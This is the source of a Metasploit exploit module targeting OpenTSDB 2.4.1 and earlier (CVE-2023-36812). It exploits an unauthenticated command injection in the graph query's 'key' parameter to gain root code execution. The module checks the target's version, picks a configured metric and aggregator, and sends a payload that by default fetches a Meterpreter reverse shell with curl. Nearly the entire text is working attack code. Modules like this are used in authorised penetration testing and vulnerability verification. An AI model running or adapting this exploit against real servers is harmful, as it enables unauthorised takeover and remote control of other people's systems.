    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'OpenTSDB 2.4.1 unauthenticated command injection',        'Description' => %q{          This module exploits an unauthenticated command injection          vulnerability in the key parameter in OpenTSDB through          2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve          unauthenticated remote code execution as the root user.          The module first attempts to obtain the OpenTSDB version via          the api. If the version is 2.4.1 or lower, the module          performs additional checks to obtain the configured metrics          and aggregators. It then randomly selects one metric and one          aggregator and uses those to instruct the target server to          plot a graph. As part of this request, the key parameter is          set to the payload, which will then be executed by the target          if the latter is vulnerable.          This module has been successfully tested against OpenTSDB          version 2.4.1.        },        'License' => MSF_LICENSE,        'Author' => [          'Gal Goldstein', # discovery          'Daniel Abeles', # discovery          'Erik Wynter' # @wyntererik - Metasploit        ],        'References' => [          ['URL', 'https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw'], # security advisory          ['CVE', '2023-36812'], # CVE linked in the official security advisory          ['CVE', '2023-25826'] # CVE that seems to be a dupe of CVE-2023-36812 since it describes the same issue and references the PR that introduces the commits that are referenced in CVE-2023-36812        ],        'Platform' => 'linux',        'Arch' => 'ARCH_CMD',        'DefaultOptions' => {          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',          'RPORT' => 4242,          'SRVPORT' => 8080,          'FETCH_COMMAND' => 'CURL',          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(2..4),          'FETCH_WRITABLE_DIR' => '/tmp',          'FETCH_SRVPORT' => 8081        },        'Targets' => [ [ 'Linux', {} ] ],        'DefaultTarget' => 0,        'Privileged' => true,        'DisclosureDate' => '2023-07-01',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options [      OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),    ]  end  def check    # sanity check to see if the target is likely OpenTSDB    res1 = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    unless res1      return CheckCode::Unknown('Connection failed.')    end    unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')      return CheckCode::Safe('Target is not an OpenTSDB application.')    end    # get the version via the api    res2 = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api', 'version')    })    unless res2      return CheckCode::Unknown('Connection failed.')    end    unless res2.code == 200 && res2.body.include?('version')      return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')    end    begin      parsed_res_body = JSON.parse(res2.body)    rescue JSON::ParserError      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')    end    unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')    end    version = parsed_res_body['version']    begin      if Rex::Version.new(version) <= Rex::Version.new('2.4.1')        return CheckCode::Appears("The target is OpenTSDB version #{version}")      else        return CheckCode::Safe("The target is OpenTSDB version #{version}")      end    rescue ArgumentError => e      return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")    end  end  def select_metric    # check if any metrics have been configured. if not, exploitation cannot work    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'suggest'),      'vars_get' => { 'type' => 'metrics' }    })    unless res      fail_with(Failure::Unknown, 'Connection failed.')    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")    end    begin      metrics = JSON.parse(res.body)    rescue JSON::ParserError      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')    end    unless metrics.is_a?(Array)      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')    end    if metrics.empty?      fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')    end    # select a random metric since any will do    @metric = metrics.sample    print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")  end  def select_aggregator    # check the configured aggregators and select one at random    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'aggregators')    })    unless res      fail_with(Failure::Unknown, 'Connection failed.')    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")    end    begin      aggregators = JSON.parse(res.body)    rescue JSON::ParserError      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')    end    unless aggregators.is_a?(Array)      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')    end    if aggregators.empty?      fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')    end    # select a random aggregator since any will do    @aggregator = aggregators.sample    print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")  end  def execute_command(cmd, _opts = {})    # we need to percent encode the entire command.    # however, the + character cannot be used and percent encoding does not help for it. so we need to change chmod +x with chmod 744    cmd = CGI.escape(cmd.gsub('chmod +x', 'chmod 744'))    start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data    start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')    end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data    end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')    get_vars = {      'start' => start_value,      'end' => end_value,      'm' => "#{@aggregator}:#{@metric}",      'o' => 'axis+x1y2',      'ylabel' => Rex::Text.rand_text_alphanumeric(8..12),      'y2label' => Rex::Text.rand_text_alphanumeric(8..12),      'yrange' => '[0:]',      'y2range' => '[0:]',      'key' => "%3Bsystem%20%22#{cmd}%22%20%22",      'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",      'style' => 'linespoint'    }    exploit_uri = '?'    get_vars.each do |key, value|      exploit_uri += "#{key}=#{value}&"    end    exploit_uri += 'json'    # using a raw request because cgi was leading to encoding issues    send_request_raw({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)    }, 0) # we don't have to wait for a reply here  end  def exploit    select_metric    select_aggregator    print_status('Executing the payload')    execute_command(payload.encoded)  endend

Tag

#js